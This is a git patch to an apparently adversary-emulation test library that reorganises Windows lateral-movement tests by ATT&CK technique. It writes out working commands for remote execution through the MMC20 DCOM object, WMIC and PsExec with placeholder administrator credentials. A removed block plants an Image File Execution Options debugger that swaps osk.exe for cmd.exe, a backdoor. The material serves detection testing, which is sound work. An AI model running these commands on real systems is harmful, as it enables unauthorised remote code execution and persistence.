From 6000965b1e25f57582fdb43093cfb400a1067a7c Mon Sep 17 00:00:00 2001 From: cnotin Date: Fri, 18 Sep 2020 15:57:11 +0200 Subject: [PATCH] T1028 "Windows Remote Management": split in several techniques Fixes #1042 --- atomics/T1021.003/T1021.003.yaml | 24 +++++++++ atomics/T1021.006/T1021.006.yaml | 85 -------------------------------- atomics/T1047/T1047.yaml | 12 ++++- atomics/T1218.003/T1218.003.yaml | 20 ++++++++ atomics/T1569.002/T1569.002.yaml | 16 ++++-- 5 files changed, 66 insertions(+), 91 deletions(-) create mode 100644 atomics/T1021.003/T1021.003.yaml diff --git a/atomics/T1021.003/T1021.003.yaml b/atomics/T1021.003/T1021.003.yaml new file mode 100644 index 0000000000..233c88eb37 --- /dev/null +++ b/atomics/T1021.003/T1021.003.yaml @@ -0,0 +1,24 @@ +attack_technique: T1021.003 +display_name: 'Remote Services: Distributed Component Object Model' +atomic_tests: +- name: PowerShell Lateral Movement using MMC20 + auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 + description: | + Powershell lateral movement using the mmc20 application com object. + + Reference: + + https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ + + Upon successful execution, cmd will spawn calc.exe on a remote computer. + supported_platforms: + - windows + input_arguments: + computer_name: + description: Name of Computer + type: string + default: localhost + executor: + command: | + [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") + name: powershell diff --git a/atomics/T1021.006/T1021.006.yaml b/atomics/T1021.006/T1021.006.yaml index b487cf03c1..2a1b759226 100644 --- a/atomics/T1021.006/T1021.006.yaml +++ b/atomics/T1021.006/T1021.006.yaml @@ -14,91 +14,6 @@ atomic_tests: Enable-PSRemoting -Force name: powershell elevation_required: true -- name: PowerShell Lateral Movement - auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 - description: | - Powershell lateral movement using the mmc20 application com object. - - Reference: - - https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ - - Upon successful execution, cmd will spawn calc.exe on a remote computer. - supported_platforms: - - windows - input_arguments: - computer_name: - description: Name of Computer - type: string - default: localhost - executor: - command: | - [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") - name: powershell -- name: WMIC Process Call Create - auto_generated_guid: 5cd59c3b-1375-4edf-9bac-5851c9915fca - description: | - Utilize WMIC to start remote process. - - Upon successful execution, cmd will utilize wmic.exe to modify the registry on a remote endpoint to swap osk.exe with cmd.exe. - supported_platforms: - - windows - input_arguments: - user_name: - description: Username - type: String - default: DOMAIN\Administrator - password: - description: Password - type: String - default: P@ssw0rd1 - computer_name: - description: Target Computer Name - type: String - default: Target - executor: - command: | - wmic /user:#{user_name} /password:#{password} /node:#{computer_name} process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f" - name: command_prompt -- name: Psexec - auto_generated_guid: 9bab84a1-08fd-4245-b681-e62c78283002 - description: | - Utilize psexec to start remote process. - - Upon successful execution, cmd will utilize psexec.exe to spawn cmd.exe on a remote system. - supported_platforms: - - windows - input_arguments: - user_name: - description: Username - type: String - default: DOMAIN\Administrator - psexec_exe: - description: Path to PsExec - type: string - default: C:\PSTools\PsExec.exe - password: - description: Password - type: String - default: P@ssw0rd1 - computer_name: - description: Target Computer Name - type: String - default: localhost - dependencies: - - description: | - PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_exe}) - prereq_command: | - if (Test-Path "#{psexec_exe}") { exit 0} else { exit 1} - get_prereq_command: | - Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip" - Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force - New-Item -ItemType Directory ("#{psexec_exe}") -Force | Out-Null - Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force - executor: - command: | - #{psexec_exe} \\#{computer_name} -accepteula -u #{user_name} -p #{password} -s cmd.exe - name: command_prompt - name: Invoke-Command auto_generated_guid: 5295bd61-bd7e-4744-9d52-85962a4cf2d6 description: | diff --git a/atomics/T1047/T1047.yaml b/atomics/T1047/T1047.yaml index 1c34b94348..735aea3b58 100644 --- a/atomics/T1047/T1047.yaml +++ b/atomics/T1047/T1047.yaml @@ -88,14 +88,22 @@ atomic_tests: description: Ip Address type: String default: 127.0.0.1 + user_name: + description: Username + type: String + default: DOMAIN\Administrator + password: + description: Password + type: String + default: P@ssw0rd1 process_to_execute: description: Name or path of process to execute. type: String default: notepad.exe executor: command: | - wmic /node:"#{node}" process call create #{process_to_execute} + wmic /user:#{user_name} /password:#{password} /node:"#{node}" process call create #{process_to_execute} cleanup_command: | - wmic /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1 + wmic /user:#{user_name} /password:#{password} /node:"#{node}" process where name='#{process_to_execute}' delete >nul 2>&1 name: command_prompt diff --git a/atomics/T1218.003/T1218.003.yaml b/atomics/T1218.003/T1218.003.yaml index 211bd7727d..b1ad36a9ad 100644 --- a/atomics/T1218.003/T1218.003.yaml +++ b/atomics/T1218.003/T1218.003.yaml @@ -49,4 +49,24 @@ atomic_tests: command: | cmstp.exe /s #{inf_file_uac} /au name: command_prompt +- name: PowerShell Lateral Movement + auto_generated_guid: 6dc74eb1-c9d6-4c53-b3b5-6f50ae339673 + description: | + Powershell lateral movement using the mmc20 application com object. + + Reference: + https://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/ + + Upon successful execution, cmd will spawn calc.exe on a remote computer. + supported_platforms: + - windows + input_arguments: + computer_name: + description: Name of Computer + type: string + default: localhost + executor: + command: | + [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.application","#{computer_name}")).Document.ActiveView.ExecuteShellCommand("c:\windows\system32\calc.exe", $null, $null, "7") + name: powershell diff --git a/atomics/T1569.002/T1569.002.yaml b/atomics/T1569.002/T1569.002.yaml index c2e2e154ee..a410b95c5e 100644 --- a/atomics/T1569.002/T1569.002.yaml +++ b/atomics/T1569.002/T1569.002.yaml @@ -31,9 +31,9 @@ atomic_tests: auto_generated_guid: 873106b7-cfed-454b-8680-fa9f6400431c description: | Requires having Sysinternals installed, path to sysinternals is one of the input input_arguments - Will run a command on a remote host. + Will start a process on a remote host. - Upon successful execution, powershell will download psexec.exe and spawn calc.exe on a remote endpoint (default:localhost). + Upon successful execution, cmd will utilize psexec.exe to spawn calc.exe on a remote endpoint (default:localhost). supported_platforms: - windows input_arguments: @@ -41,6 +41,14 @@ atomic_tests: description: Remote hostname or IP address type: string default: localhost + user_name: + description: Username + type: String + default: DOMAIN\Administrator + password: + description: Password + type: String + default: P@ssw0rd1 psexec_exe: description: Path to PsExec type: string @@ -57,5 +65,5 @@ atomic_tests: Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_exe}" -Force executor: command: | - #{psexec_exe} \\#{remote_host} -accepteula "C:\Windows\System32\calc.exe" - name: powershell + #{psexec_exe} \\#{remote_host} -u #{user_name} -p #{password} -accepteula "C:\Windows\System32\calc.exe" + name: command_prompt